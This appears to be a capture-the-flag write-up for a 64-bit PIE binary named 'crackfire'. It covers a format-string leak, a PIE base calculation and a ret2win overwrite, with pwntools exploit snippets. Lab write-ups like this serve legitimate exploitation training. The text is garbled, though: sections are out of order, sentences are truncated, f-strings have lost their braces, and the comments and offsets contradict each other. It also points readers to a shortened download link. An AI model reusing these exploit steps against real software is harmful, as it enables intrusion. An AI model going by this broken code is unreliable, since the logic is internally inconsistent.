The final layout:
0x555555555580 0x7fffffffde10 0x555555554b40 0x555555554b88 ... The pointer ( 0x555555554b40 ) matches the address of the saved RIP (confirmed by comparing to gdb ’s info frame ).
def get_base(p): """Leak a known symbol (e.g., _start) to compute PIE base.""" # _start is at offset 0x4000 from base (found via readelf) leak = leak_address(p, "%p %p %p %p %p %p") # The second pointer (index 1) is usually _start in this binary # Adjust as needed by inspecting the output. # For illustration we assume leak is the PIE base directly. base = leak - elf.sym['_start'] log.success(f"PIE base: hex(base)") return base
The is stored in the binary as a global: https- bit.ly crackfire
Challenge type: Binary exploitation (pwn) – 64‑bit Linux Difficulty: Medium / Hard (depends on the exact variant) Points: 500 (CTF typical) TL;DR – The binary is a simple “crack‑the‑code” game that reads a user‑supplied string, checks it against a secret flag stored in the binary, and then prints “Access granted!” on success. The binary contains a classic format‑string vulnerability that lets us leak the address of the secret and later overwrite the check function’s return address to jump to win . By combining an info‑leak with a one‑shot ret2win payload we obtain the flag. Below is a step‑by‑step walkthrough that shows the thought process, the tools used, and the final exploit script (Python + pwntools). Feel free to copy the script and adapt it for the exact binary you downloaded from the short link. 1. Getting the binary The challenge link ( https://bit.ly/crackfire ) resolves to a zip file containing:
The binary is compiled PIE, so we need to of _start (found via readelf -s crackfire | grep _start → 0x4006f0 ) to get the load address:
# ---------------------------------------------------------------- def leak_address(p, fmt): """Send a format string and return the first leaked pointer.""" p.sendlineafter(b"Enter the secret code:", fmt.encode()) p.recvuntil(b"Enter the secret code:\n") leak = p.recvline().strip() # The leak may contain spaces; take first token addr = int(leak.split()[0], 16) log.success(f"Leaked: hex(addr)") return addr # For illustration we assume leak is the PIE base directly
# ---------------------- CONFIGURATION ------------------------ binary = "./crackfire" elf = ELF(binary) context.binary = binary context.log_level = "info"
We’ll use the syntax to reference the n‑th argument directly. 7. Crafting the write payload We want to write the address of win (e.g., 0x5555555552f0 ) into the saved RIP located at stack position 3 (the third argument after the format string).
Invalid code! Try again. If you guess correctly you get: By combining an info‑leak with a one‑shot ret2win
%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p Output (truncated):
0x404060: "t0pS3cr3tC0de!" In main you’ll see:
Pseudo‑code:
Key functions: